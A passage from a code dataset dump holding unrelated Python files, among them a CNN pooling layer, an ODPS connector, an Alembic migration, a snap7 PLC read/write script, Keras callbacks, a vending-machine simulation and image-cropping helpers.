print('input array:\\n%s\\noutput array:\\n%s' % (a,mpl.output_array))\r\n\r\n\r\ndef test_pool_bp():\r\n a, b, mpl = init_pool_test()\r\n mpl.backward(a, b)\r\n print('input array:\\n%s\\nsensitivity array:\\n%s\\ndelta array:\\n%s' % (a, b, mpl.delta_array))\r\n# 获取一个2D区域的最大值所在的索引\r\ndef get_max_index(array):\r\n max_i = 0\r\n max_j = 0\r\n max_value = array[0,0]\r\n for i in range(array.shape[0]):\r\n for j in range(array.shape[1]):\r\n if array[i,j] > max_value:\r\n max_value = array[i,j]\r\n max_i, max_j = i, j\r\n return max_i, max_j\r\nif __name__==\"__main__\":\r\n # gradient_check()\r\n # test_bp()\r\n # test_pool()\r\n test_pool_bp()","sub_path":"algorithm_learn/NeuralNetwork/ConvLayer.py","file_name":"ConvLayer.py","file_ext":"py","file_size_in_byte":15705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412580562","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/globenet/paste/templates.py\n# Compiled at: 2008-08-26 14:23:46\nfrom __future__ import with_statement\nfrom paste.script import templates, command\nimport subprocess, os, yaml\n\nclass GlobenetTemplate(templates.Template):\n egg_plugins = [\n 'globenet']\n summary = 'Template for creating a basic globenet package'\n _template_dir = 'project'\n use_cheetah = True\n\n def post(self, command, output_dir, vars):\n subprocess.Popen(['python', 
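# The MaxPoolingLayer above routes each sensitivity value back to the argmax
# of its input patch via the hand-written get_max_index(). A minimal
# self-contained numpy sketch of the same forward/backward idea (my own
# illustration, not the record's get_patch-based code), using
# np.unravel_index instead of the double loop:
import numpy as np

def max_pool_forward(x, k, stride):
    c, h, w = x.shape
    oh, ow = (h - k) // stride + 1, (w - k) // stride + 1
    out = np.zeros((c, oh, ow))
    for d in range(c):
        for i in range(oh):
            for j in range(ow):
                out[d, i, j] = x[d, i*stride:i*stride+k, j*stride:j*stride+k].max()
    return out

def max_pool_backward(x, delta_out, k, stride):
    delta_in = np.zeros_like(x)
    c, oh, ow = delta_out.shape
    for d in range(c):
        for i in range(oh):
            for j in range(ow):
                patch = x[d, i*stride:i*stride+k, j*stride:j*stride+k]
                ki, kj = np.unravel_index(patch.argmax(), patch.shape)
                delta_in[d, i*stride+ki, j*stride+kj] += delta_out[d, i, j]
    return delta_in

x = np.arange(32, dtype=float).reshape(2, 4, 4)
y = max_pool_forward(x, 2, 2)                       # shape (2, 2, 2)
print(max_pool_backward(x, np.ones_like(y), 2, 2))  # ones land on each patch max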
'bootstrap.py', '--no-site-packages', 'env'], cwd=output_dir)\n\n\nclass ControllerTemplate(templates.Template):\n egg_plugins = [\n 'globenet']\n summary = 'Template for creating globenet controllers'\n _template_dir = 'controller'\n use_cheeta = True\n\n\nclass GlobenetGenerate(command.Command):\n usage = 'CONTROLLER_NAME'\n summary = 'generate parts of your project'\n group_name = 'globenet'\n parser = command.Command.standard_parser(simulate=True, quiet=True, overwrite=True, interactive=True)\n\n def command(self):\n template = ControllerTemplate('controller')\n if not self.args:\n if self.interactive:\n controllername = self.challenge('Enter controller name')\n else:\n raise command.BadCommand('You must provider a CONTROLLER_NAME')\n else:\n controllername = self.args[0]\n vars = {'controller': controllername}\n vars.update(self.parse_vars(self.args[1:]))\n template.run(self, 'controllers', vars)\n if os.path.exists('config.ini'):\n with open('config.ini', 'r') as (f):\n c = f.read()\n config = yaml.load(c)\n else:\n config = {}\n if 'controllers' not in config:\n config['controllers'] = []\n config['controllers'].append({'class': 'controllers.%s.%s' % (controllername, controllername.capitalize()), \n 'url': controllername})\n with open('config.ini', 'w+') as (f):\n f.write(yaml.dump(config))","sub_path":"pycfiles/globenet-0.2-py2.5/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22586683","text":"import csv \nfrom datetime import datetime\nfrom odps import ODPS \nimport time \nimport uuid \nimport os \nfrom .logger_setting import logger \n\n\n# Defining ODPS specific class to work with \n\nclass OdpsConnector: \n\n def connect(self, accessId, accessKey, project, endPoint, tunnelEndPoint, retry_time = 0, buffering = 5):\n attempt = 0\n\n while attempt == 0 or attempt < retry_time:\n try: \n logger.info(\"Connecting...\") \n\n self.connection = ODPS(\n access_id = accessId\n , secret_access_key = accessKey\n , project = project\n , endpoint = endPoint \n ,tunnel_endpoint = tunnelEndPoint\n ) \n logger.info(\"Connection established.\")\n return True \n\n except Exception as e:\n attempt += 1\n issue = e \n message = \"Attempt {}. {}. Retrying .....\".format(attempt, issue)\n logger.error(message) \n time.sleep(buffering) \n continue \n\n raise RuntimeError(\"Can not access to ODPS due to {}\".format(issue)) \n\n\n\n def read_sql(self, file_path):\n with open(file_path, \"r\", encoding = \"utf-8\") as file:\n query = file.read()\n\n return query \n \n\n\n def extract_header(self, csv_file_path): \n with open(csv_file_path, \"r\", newline = \"\") as file:\n reader = csv.reader(file)\n header = \",\".join(next(reader))\n\n return header \n\n\n\n def run_query(self, query, return_data = False, retry_time = 0, buffering = 5): \n \n attempt = 0\n\n while attempt == 0 or attempt < retry_time:\n try:\n logger.info(\"Querying.....\") \n\n with self.connection.execute_sql(query, None, 1, hints = {\"odps.sql.submit.mode\" : \"script\"}).open_reader() as reader:\n logger.info(\"Query is finished\")\n\n if return_data == True: \n return reader.to_pandas() \n else: \n return reader \n except Exception as e:\n attempt += 1\n issue = e \n message = \"Attempt {}. {}. 
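# The connect()/run_query() methods above share one retry-with-sleep shape.
# A hedged, self-contained sketch of that pattern as a decorator; the name
# `retry` is invented here for illustration and is not part of pyodps:
import functools
import time

def retry(times=3, delay=0.1):
    def wrap(fn):
        @functools.wraps(fn)
        def inner(*args, **kwargs):
            last = None
            for attempt in range(1, times + 1):
                try:
                    return fn(*args, **kwargs)
                except Exception as e:  # broad catch, mirroring the code above
                    last = e
                    print("Attempt {}. {}. Retrying .....".format(attempt, e))
                    time.sleep(delay)
            raise RuntimeError("Gave up after {} attempts".format(times)) from last
        return inner
    return wrap

@retry(times=2)
def flaky():
    raise IOError("simulated network error")

try:
    flaky()
except RuntimeError as e:
    print(e)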
Retrying .....\".format(attempt, issue)\n logger.error(message) \n time.sleep(buffering) \n continue \n \n raise RuntimeError(\"Cannot query from ODPS due to: {}\".format(issue)) \n\n\n\n def dump_to_csv(self, query, storage_path, filename = None, retry_time = 0, buffering = 5): \n if not filename:\n filename = str(uuid.uuid4())\n\n filename = filename + \".csv\"\n\n filepath = os.path.join(storage_path, filename)\n\n reader = self.run_query(query, retry_time = retry_time, buffering = buffering)\n logger.info(\"Done dumping to csv file {}\".format(filename))\n with open(filepath, \"w\", encoding =\"utf-8\") as file:\n writer = csv.writer(file, delimiter = \",\", quoting = csv.QUOTE_NONNUMERIC\n , lineterminator = \"\\n\")\n \n writer.writerow(reader._schema.names)\n\n for record in reader: \n writer.writerow(record[0:])\n \n return filepath\n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pyool/pyodps.py","file_name":"pyodps.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"553840217","text":"\"\"\"many-to-many relationship between collections and entities\n\nRevision ID: 8526f853643a\nRevises: cc03d89e76c8\nCreate Date: 2016-05-02 12:31:12.457470\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '8526f853643a'\ndown_revision = 'cc03d89e76c8'\n\n\ndef upgrade():\n op.create_table('collection_entity',\n sa.Column('entity_id', sa.String(length=32), nullable=True),\n sa.Column('collection_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['collection_id'], ['collection.id'], ),\n sa.ForeignKeyConstraint(['entity_id'], ['entity.id'], )\n ) # noqa\n bind = op.get_bind()\n meta = sa.MetaData()\n meta.bind = bind\n meta.reflect()\n entity_table = meta.tables['entity']\n collection_entity_table = meta.tables['collection_entity']\n rp = bind.execute(sa.select([entity_table]))\n for ent in rp.fetchall():\n if ent['collection_id'] is None:\n continue\n q = collection_entity_table.insert({\n 'entity_id': ent['id'],\n 'collection_id': ent['collection_id']\n })\n bind.execute(q)\n op.drop_constraint('entity_collection_id_fkey', 'entity',\n type_='foreignkey')\n op.drop_column('entity', 'collection_id')\n\n\ndef downgrade():\n op.add_column('entity', sa.Column('collection_id', sa.INTEGER(), autoincrement=False, nullable=True)) # noqa\n op.create_foreign_key('entity_collection_id_fkey', 'entity', 'collection', ['collection_id'], ['id']) # noqa\n op.drop_table('collection_entity')\n","sub_path":"aleph/migrate/versions/8526f853643a_many_collections_entities.py","file_name":"8526f853643a_many_collections_entities.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264904296","text":" #salary calculator\n#Q. An employee gets paid(hours worked)*(base pay), for each hours upto 40 hours, for every hour over 40 hours, they get ovewrtime =(base pay)*1.5. 
calculate total salary.\n\n#storing base pay of the employee\nbasePay=input(\"enter the base pay of the employee >\")\n\n#storing normal working hours of an employee\ntotalHours=input(\" enter the total number of hours worked upto 40hours >\")\n\n# storing extra hours worked by an employee\nextraHours=input(\"extra hours worked >\")\n\n#normal pay of an employee (inputs are strings, so convert both factors)\nsalary= (float(basePay)*float(totalHours))\n\n#pay for extra hours\nsalaryForOvertime= (float(basePay)*1.5*float(extraHours))\n\n#pay after including overtime\ntotalSalary=salaryForOvertime+salary\n\n#result\nprint(totalSalary)\n","sub_path":"salary.python.py","file_name":"salary.python.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"516558645","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport snap7\n# import plc as PLC # import the plc.py file from earlier (note: both py files sit in the same folder)\nfrom snap7.util import * # the bit-level helper functions live in this module\n\n# helper that writes a single bit QX.X of the outputs directly\ndef Writeoutput(dev,byte,bit,cmd):\n    data=dev.read_area(0x82,0,byte,1)# 0x82 is the output area Q, byte is the start address (Q0), 1 means read one byte\n    set_bool(data,byte,bit,cmd) # set Qbyte.bit (here Q0.6) to cmd (True or False)\n    dev.write_area(0x82,0,byte,data)# write the modified byte back the same way\n    \n# this helper only performs a read\ndef Readoutput(dev,byte,bit):\n    data=dev.read_area(0x82,0,byte,1)\n    status=get_bool(data,byte,bit) # fetch the bit state\n    return status\n\nmyplc=snap7.client.Client()\nmyplc.connect('192.168.2.1', rack=0,slot=1) # open the connection (IP, rack and slot come from the TIA project)\nprint(myplc.get_connected()) # check that communication succeeded\n\n# use the two helpers built above (write, read)\nWriteoutput(myplc,0,6,True) # writes Q0.6 as True\nstatus=Readoutput(myplc,0,6) # reads the value of Q0.6\nprint(status)\n","sub_path":"read_write_plc.py","file_name":"read_write_plc.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16128453","text":"import os\nimport sys\nimport pdb\n\nimport keras\nimport numpy as np\nimport tensorflow as tf\nfrom keras.callbacks import (\n    TerminateOnNaN,\n    ModelCheckpoint,\n    LearningRateScheduler,\n    TensorBoard,\n    ReduceLROnPlateau\n)\n\nfrom .metrics import Metrics\nfrom .visualize import plot_confusion_matrix\n\n\ndef lr_scheduler(epoch, lr):\n\tif epoch <= 20:\n\t\treturn lr*0.95\n\telif epoch <= 40:\n\t\treturn lr*0.93\n\telif epoch <= 80:\n\t\treturn lr*0.9\n\treturn lr  # fallback so Keras never receives None past epoch 80\n\ndef create_callbacks(args, generator):\n\n\tfilepath = os.path.join(os.path.dirname(__file__), '..', 'model_data', 'weights', args.topic)\n\n\tlog_dir = os.path.join(os.path.dirname(__file__), '..', 'model_data', 'logs', args.topic)\n\n\tcallbacks = []\n\n\tcallbacks.append(TerminateOnNaN())\n\n\tcallback_checkpoint = ModelCheckpoint(\n\t\tfilepath = os.path.join(filepath, '{epoch:03d}-{val_categorical_accuracy:.5f}.hdf5'),\n\t\tmonitor = 'val_categorical_accuracy',\n\t\tverbose = 1,\n\t\tsave_best_only = True,\n\t\tsave_weights_only = True\n\t)\n\n\tcallbacks.append(callback_checkpoint)\n\n\tcallback_lr_scheduler = LearningRateScheduler(\n\t\tschedule = lr_scheduler,\n\t\tverbose = 1\n\t)\n\n\tcallbacks.append(callback_lr_scheduler)\n\n\tcallback_tensorboard = TensorBoard(\n\t\tlog_dir = log_dir,\n\t\thistogram_freq = 0,\n\t\twrite_graph = True,\n\t\twrite_grads = True,\n\t\twrite_images = True,\n\t\tbatch_size = args.batch_size\n\t)\n\n\tcallbacks.append(callback_tensorboard)\n\n\tcallback_benchmark = Benchmark(\n\t\tgenerator = generator,\n\t\ttensorboard = callback_tensorboard,\n\t\tf1_score = True,\n\t\tprecision = True,\n\t\trecall = True,\n\t\tconfusion_matrix = False,\n\t\tverbose = 
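# What snap7's set_bool/get_bool do to the fetched byte can be shown with
# plain Python bit operations, no PLC required (a hedged illustration of the
# idea, not the snap7 implementation itself):
def set_bit(buf, byte_index, bit_index, value):
    if value:
        buf[byte_index] |= (1 << bit_index)
    else:
        buf[byte_index] &= ~(1 << bit_index)

def get_bit(buf, byte_index, bit_index):
    return bool(buf[byte_index] & (1 << bit_index))

data = bytearray(1)         # one output byte, like Q0
set_bit(data, 0, 6, True)   # Q0.6 := True
print(get_bit(data, 0, 6))  # True
print(bin(data[0]))         # 0b1000000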
1\n\t)\n\n\tcallbacks.append(callback_benchmark)\n\n\treturn callbacks\n\n\n\nclass Benchmark(keras.callbacks.Callback):\n\tdef __init__ (\n\t\tself,\n\t\tgenerator,\n\t\ttensorboard = None,\n\t\tf1_score = False,\n\t\tprecision = False,\n\t\trecall = False,\n\t\tconfusion_matrix = False,\n\t\tverbose = 1\n\t):\n\n\t\tself.generator = generator\n\t\tself.tensorboard = tensorboard\n\t\tself.verbose = verbose\n\t\tself.f1_score = f1_score\n\t\tself.precision = precision\n\t\tself.recall = recall\n\t\tself.confusion_matrix = confusion_matrix\n\n\t\tlabels = sorted(list(self.generator.class_indices.keys()))\n\t\ty_true = self.generator.classes.tolist()\n\t\tself.metrics = Metrics(labels=labels, y_true=y_true)\n\n\t\tsuper(Benchmark, self).__init__()\n\n\tdef on_epoch_end(self, epoch, logs=None):\n\t\tself.generator.reset()\n\t\tself.metrics.y_pred = np.argmax(self.model.predict_generator(self.generator, verbose=1), axis=-1).tolist()\n\t\tif self.tensorboard is not None and self.tensorboard.writer is not None:\n\t\t\tsummary = tf.Summary()\n\t\t\tif self.f1_score:\n\t\t\t\tsummary_value = summary.value.add()\n\t\t\t\tlogs['f1_score'] = self.metrics.compute_f1_score()\n\t\t\t\tsummary_value.simple_value = logs['f1_score']\n\t\t\t\tsummary_value.tag = \"F1_score\"\n\n\t\t\tif self.precision:\n\t\t\t\tsummary_value = summary.value.add()\n\t\t\t\tlogs['precision'] = self.metrics.compute_precision()\n\t\t\t\tsummary_value.simple_value = logs['precision']\n\t\t\t\tsummary_value.tag = \"Precision\"\n\n\t\t\tif self.recall:\n\t\t\t\tsummary_value = summary.value.add()\n\t\t\t\tlogs['recall'] = self.metrics.compute_recall()\n\t\t\t\tsummary_value.simple_value = logs['recall']\n\t\t\t\tsummary_value.tag = \"Recall\"\n\n\t\tif self.confusion_matrix:\n\t\t\tlogs['confusion_matrix'] = self.metrics.compute_confusion_matrix()\n\t\t\tif epoch % 10 == 0:\n\t\t\t\tplot_confusion_matrix(\n\t\t\t\t\tconfusion_matrix = confusion_matrix,\n\t\t\t\t\tclasses = metrics.labels,\n\t\t\t\t\tnormalize = True,\n\t\t\t\t\ttitle = 'Normalized confusion matrix',\n\t\t\t\t)\n\t\tfor metrics, values in logs.items():\n\t\t\tprint('{}: {}'.format(metrics, values))\n\t\tprint()\n","sub_path":"utils/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"526750247","text":"import csv\nimport os\nfrom random import randint, uniform\n\n# A_csv_to_dicts.py\n\n# File converts the csv files into the required data structures (dictionaries)\n\n\n# denominations dictionary converter\ndef curr_to_dict(currency_file):\n denominations = {}\n with open(currency_file, 'r') as my_file:\n reader = csv.reader(my_file)\n for row in reader:\n value = []\n for column in row:\n value.append(column)\n denominations[row[0]] = value[1:]\n return denominations\n\n\n# denominations stock dictionary converter\ndef denom_stock_to_dict(stock_file, currency):\n denom_stock = {}\n\n with open(stock_file, 'r') as my_file:\n reader = csv.reader(my_file)\n value = {}\n for row in reader:\n value[row[0]] = int(row[1])\n denom_stock[currency] = value\n return denom_stock\n\n\n# products stock dictionary converter\ndef products_to_dict(prod_file):\n products = {}\n with open(prod_file, 'r') as my_file:\n reader = csv.reader(my_file)\n for row in reader:\n value = {}\n value['product name'] = row[1]\n value['price'] = float(row[2])\n value['count'] = int(row[3])\n products[int(row[0])] = value\n return products\n\n\n# data in dict 
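# The Benchmark callback above logs F1/precision/recall through the project's
# Metrics helper. A dependency-free sanity check of those formulas for a
# binary example (my own sketch, not the Metrics implementation):
def prf(y_true, y_pred):
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return precision, recall, f1

# tp=2, fp=1, fn=1 -> precision = recall = f1 = 2/3
print(prf([1, 0, 1, 1, 0], [1, 0, 0, 1, 1]))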
format\ncurrency = curr_to_dict('currency.csv')\ndenom_stock = denom_stock_to_dict('dstock.csv', 'GBP')\nproducts = products_to_dict('products.csv')\n\n\n# F_Change.py\ndef change(amount, coins, result=None):\n result = [] if result is None else result\n if len(coins) == 0:\n return len(result), result\n\n max_coin = max(coins)\n coins.remove(max_coin)\n answer = amount // max_coin\n if answer == 0 and max_coin < amount:\n result = result + ([max_coin] * answer)\n return result\n else:\n result = result + ([max_coin] * answer)\n return change(amount % max_coin, coins, result)\n\n\ncoin_list = [200, 100, 50, 20, 10, 5, 2, 1]\n\n\ndef formatter(amount, coins, result=None):\n if amount < 0:\n return []\n result_coins = change(amount, coins, result=None)[1]\n\n change_given = []\n for coin in result_coins:\n change_given.append(str(format(coin / float(100), '.2f')))\n return change_given\n\n# Script adds to the relevent logging files\n\n# B_purchase_logging.py\n\n\ndef add_change_log(code, input_val):\n\n coins_given = formatter(int(float(format\n (input_val - products[code]['price'],\n '.2f')) * 100), [200, 100, 50, 20, 10, 5, 2, 1])\n\n change = [str(code).zfill(2), str(round(input_val, 2))]\n change.extend(coins_given)\n with open('changes.txt', 'a') as my_file:\n my_file.write(', '.join(change))\n my_file.write('\\n')\n\n\ndef add_product_log(code):\n product_log = [str(code).zfill(2), products[code]['product name'],\n products[code]['price'], (products[code]['count'])]\n with open('purchase_log.csv', 'a') as my_file:\n writer = csv.writer(my_file, dialect='excel')\n writer.writerow(product_log)\n\n\ndef add_denom_log(code, input_val):\n coins_given = formatter(int(float(format\n (input_val - products[code]['price'],\n '.2f')) * 100), [200, 100, 50, 20, 10, 5, 2, 1])\n for coin in coins_given:\n denom_log = [coin, denom_stock['GBP'][coin]]\n with open('dstock_log.csv', 'a') as my_file:\n writer = csv.writer(my_file)\n writer.writerow(denom_log)\n\n\ndef add_denom_log_2():\n with open('dstock_log.csv', 'a') as my_file:\n writer = csv.writer(my_file)\n for row in sorted(denom_stock['GBP'].iteritems()):\n writer.writerow(row)\n\n\n# coin checking function, needs moving\ndef coin_check(code, input_val):\n change_given = format(input_val - products[code]['price'], '.2f')\n coin_list = denom_stock['GBP'].keys()\n if ((change_given in coin_list or change_given is '0.0') and\n change_given is not '0.0'):\n coin_count = denom_stock['GBP'][change_given]\n if coin_count > 0 or change_given is '0.0':\n print(change_given, 'Exact change CAN be returned')\n # this needs to decrement the coin count in denom_log\n else:\n print(change_given)\n else:\n print(change_given)\n\n\n# C_purchase_function.py\n\ndef purchase_test(code, input_val):\n if code in products: # if code exists in product list\n if input_val >= products[code]['price']: # if enough money\n if products[code]['count'] > 0: # if item in stock\n\n change_given = format(input_val -\n products[code]['price'], '.2f')\n coins_given = formatter(int\n (float(format\n (input_val - products[code]['price'],\n '.2f')) * 100),\n [200, 100, 50, 20, 10, 5, 2, 1])\n\n if float(change_given) == 0:\n products[code]['count'] -= 1\n # changes.txt file\n add_change_log(code, input_val) # add change 'log'\n # products.csv file\n add_product_log(code) # add product 'log'\n # if required coins are in stock\n\n elif len(coins_given) > 0:\n if all(denom_stock['GBP'][coin] > 0 for\n coin in coins_given):\n products[code]['count'] -= 1\n for coin in coins_given:\n 
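# The recursive change() above implements greedy change-making; the same idea
# reads more directly with divmod over descending denominations (a hedged
# alternative sketch, amounts in pence):
def make_change(amount, denominations=(200, 100, 50, 20, 10, 5, 2, 1)):
    coins = []
    for d in sorted(denominations, reverse=True):
        n, amount = divmod(amount, d)
        coins.extend([d] * n)
    return coins

print(make_change(237))  # [200, 20, 10, 5, 2]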
denom_stock['GBP'][coin] -= 1\n # decrement stock count\n # changes.txt file\n add_change_log(code, input_val) # add change 'log'\n # products.csv file\n add_product_log(code) # add product 'log'\n # dstock.csv file\n add_denom_log(code, input_val) # add denom 'log'\n else:\n with open('changes.txt', 'a') as my_file:\n my_file.write(\"Can't return change\\n\")\n else:\n with open('changes.txt', 'a') as my_file:\n my_file.write(\"Item out of stock\\n\") # if stock count < 1\n else:\n with open('changes.txt', 'a') as my_file:\n my_file.write(\"Insufficient funds\\n\") # if not enough money\n else:\n with open('changes.txt', 'a') as my_file: # if code doesn't exist\n my_file.write(\"Wrong code inserted\\n\")\n coins_given = formatter(int(float(format\n (input_val - products[code]['price'],\n '.2f')) * 100), [200, 100, 50, 20, 10, 5, 2, 1])\n return coins_given\n\n\n# D_dict_to_csv.py\n\n# used to create a temporary products file after orders\ndef prod_updated_csv(in_csv, out_csv):\n if os.path.exists('purchase_log.csv') is False:\n open('purchase_log.csv', 'w')\n upd_products = products_to_dict(in_csv)\n full = products.keys()\n current = upd_products.keys()\n missing = list(set(full) - set(current))\n\n for i in missing:\n upd_products[i] = products[i]\n\n fields = ['product name', 'price', 'count']\n with open(out_csv, 'w') as out_file:\n writer = csv.DictWriter(out_file, fields)\n for key in upd_products:\n writer.writerow(({field: upd_products[key].get(field) for\n field in fields}))\n\n\nprod_updated_csv('purchase_log.csv', 'products_updated_temp.csv')\n\n\n# issue with csv, workaround\ndef add_column(in_csv, out_csv):\n\n with open(in_csv, 'r') as input_file, open(out_csv, 'w') as output_file:\n reader = csv.reader(input_file)\n writer = csv.writer(output_file)\n\n all = []\n row = next(reader)\n row.insert(0, 1)\n all.append(row)\n for k, row in enumerate(reader):\n all.append([str(k + 2)] + row)\n writer.writerows(all)\n\n\nadd_column('products_updated_temp.csv', 'products_updated.csv')\n\n\n# used to create a temporary denom file after orders\ndef denom_updated_csv(in_csv, out_csv):\n if os.path.exists('dstock_log.csv') is False:\n open('dstock_log.csv', 'w')\n upd_denom_stock = denom_stock_to_dict(in_csv, 'GBP')\n full = denom_stock['GBP'].keys()\n current = upd_denom_stock['GBP'].keys()\n missing = list(set(full) - set(current))\n\n for i in missing:\n upd_denom_stock['GBP'][i] = denom_stock['GBP'][i]\n\n coins = list(upd_denom_stock[list(upd_denom_stock.keys())[0]].keys())\n coin_to_counts = []\n for i in coins:\n pair = (str(format(float(i), '.2f')),\n upd_denom_stock[list(upd_denom_stock.keys())[0]][i])\n coin_to_counts.append(pair)\n\n with open(out_csv, 'w') as out_file:\n csv_out = csv.writer(out_file)\n for row in coin_to_counts:\n csv_out.writerow(row)\n\n\ndenom_updated_csv('dstock_log.csv', 'dstock_updated.csv')\n\n\n# E_remove_files.py\n\n# remove the temporary and logging csv files\ndef clean():\n to_remove = ['products_updated_temp.csv',\n 'purchase_log.csv',\n 'dstock_log.csv',\n 'products.csv',\n 'dstock.csv'\n ]\n\n for f in to_remove:\n os.remove(f)\n\n os.rename('products_updated.csv', 'products.csv')\n os.rename('dstock_updated.csv', 'dstock.csv')\n\n\n# main.py\n\ndef main(code, input_val):\n\n # write the results of each simulation to simulations.tct\n if os.path.exists('simulations.txt') is False:\n open('simulations.txt', 'w')\n with open('simulations.txt', 'a') as my_file:\n simulation = [code, format(input_val, '.2f')]\n writer = csv.writer(my_file, 
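# Note that prod_updated_csv() writes rows without a header row. The usual
# csv.DictWriter pattern emits one first; a runnable sketch against an
# in-memory buffer (illustration only, field names assumed from above):
import csv
import io

rows = [{'product name': 'cola', 'price': 1.2, 'count': 5}]
buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=['product name', 'price', 'count'])
writer.writeheader()
writer.writerows(rows)
print(buf.getvalue())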
dialect='excel')\n writer.writerow(simulation)\n\n # simulation\n purchase_test(code, input_val)\n\n # dict to csv\n prod_updated_csv('purchase_log.csv', 'products_updated_temp.csv')\n add_column('products_updated_temp.csv', 'products_updated.csv')\n denom_updated_csv('dstock_log.csv', 'dstock_updated.csv')\n\n # clean\n clean()\n\n\ndef test(num):\n for i in range(0, num):\n main(randint(1, 4), round(uniform(0.5, 2) / 0.01) * 0.01)\n\n\ntest(100)\n","sub_path":"Python 3/p3_one_script.py","file_name":"p3_one_script.py","file_ext":"py","file_size_in_byte":10310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"531033290","text":"import skimage.io\nimport skimage.transform\nfrom PIL import ImageFile\nimport os\n#import ipdb\n\nimport numpy as np\n\nimport cv2\n\n#def load_image( path, height=128, width=128 ):\n\n# Frizy changed : load image 128-->512\n# def load_image( path, pre_height=146, pre_width=146, height=128, width=128 ):\ndef load_image( path, pre_height=274, pre_width=274, height=256, width=256 ):\n try:\n # img = skimage.io.imread( path ).astype( float )\n img = cv2.imread(path).astype(float)\n except:\n return None\n\n img /= 255.\n\n if img is None: return None\n if len(img.shape) < 2: return None\n if len(img.shape) == 4: return None\n if len(img.shape) == 2: img=np.tile(img[:,:,None], 3)\n if img.shape[2] == 4: img=img[:,:,:3]\n if img.shape[2] > 4: return None\n\n # Frizy changed\n # short_edge = min( img.shape[:2] )\n # yy = int((img.shape[0] - short_edge) / 2)\n # xx = int((img.shape[1] - short_edge) / 2)\n # crop_img = img[yy:yy+short_edge, xx:xx+short_edge]\n # resized_img = skimage.transform.resize( crop_img, [pre_height,pre_width] )\n # resized_img = skimage.transform.resize(img, [pre_height, pre_width])\n resized_img = cv2.resize(img, (pre_width,pre_height) )\n\n rand_y = np.random.randint(0, pre_height - height)\n rand_x = np.random.randint(0, pre_width - width)\n\n resized_img = resized_img[ rand_y:rand_y+height, rand_x:rand_x+width, : ]\n\n return (resized_img * 2)-1 #(resized_img - 127.5)/127.5\n\n\n# Frizy add for mul : load two images\ndef load_image_mul( path_left, path_right, pre_height=274, pre_width=274, height=256, width=256 ):\n try:\n img_left = cv2.imread(path_left).astype(float)\n img_right= cv2.imread(path_right).astype(float)\n except:\n return None\n\n img_left /= 255.\n img_right /= 255.\n\n if img_left is None or img_right is None: return None\n if len(img_left.shape) < 2 or len(img_right.shape)<2 : return None\n if len(img_left.shape) == 4 or len(img_right.shape)==4: return None\n if len(img_left.shape) == 2: img_left = np.tile(img_left[:,:,None], 3)\n if len(img_right.shape) == 2: img_right = np.tile(img_right[:, :, None], 3)\n if img_left.shape[2] == 4: img_left=img_left[:,:,:3]\n if img_right.shape[2] == 4: img_right = img_right[:, :, :3]\n if img_left.shape[2] > 4 or img_right.shape[2]>4 : return None\n\n resized_img_left = cv2.resize(img_left, (pre_width,pre_height) )\n resized_img_right = cv2.resize(img_right, (pre_width, pre_height))\n\n rand_y = np.random.randint(0, pre_height - height)\n rand_x = np.random.randint(0, pre_width - width)\n\n resized_img_left = resized_img_left[ rand_y:rand_y+height, rand_x:rand_x+width, : ]\n resized_img_right = resized_img_right[rand_y:rand_y + height, rand_x:rand_x + width, :]\n\n resized_img_left = (resized_img_left * 2) - 1\n resized_img_right = (resized_img_right * 2) - 1\n\n resized_img_all = 
np.concatenate((resized_img_left,resized_img_right),axis=2)\n\n return resized_img_all\n\n# Frizy changed: width , height\ndef crop_random(image_ori, width=64,height=64, x=None, y=None, overlap=7):\n if image_ori is None: return None\n random_y = np.random.randint(overlap, height-overlap) if x is None else x\n random_x = np.random.randint(overlap, width-overlap) if y is None else y\n\n image = image_ori.copy()\n crop = image_ori.copy()\n crop = crop[random_y:random_y+height, random_x:random_x+width]\n image[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 0] = 2*117. / 255. - 1.\n image[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 1] = 2*104. / 255. - 1.\n image[random_y + overlap:random_y+height - overlap, random_x + overlap:random_x+width - overlap, 2] = 2*123. / 255. - 1.\n\n return image, crop, random_x, random_y\n\n\n# Frizy add: for crop for mul images\ndef crop_random_all(image_ori_all, width=64,height=64, x=None, y=None, overlap=7):\n if image_ori_all is None: return None\n random_y = np.random.randint(overlap, height-overlap) if x is None else x\n random_x = np.random.randint(overlap, width-overlap) if y is None else y\n\n image_all = image_ori_all.copy()\n crop = image_ori_all.copy()\n crop = crop[random_y:random_y+height, random_x:random_x+width, 0:3]\n image_all[random_y + overlap:random_y+height - overlap, 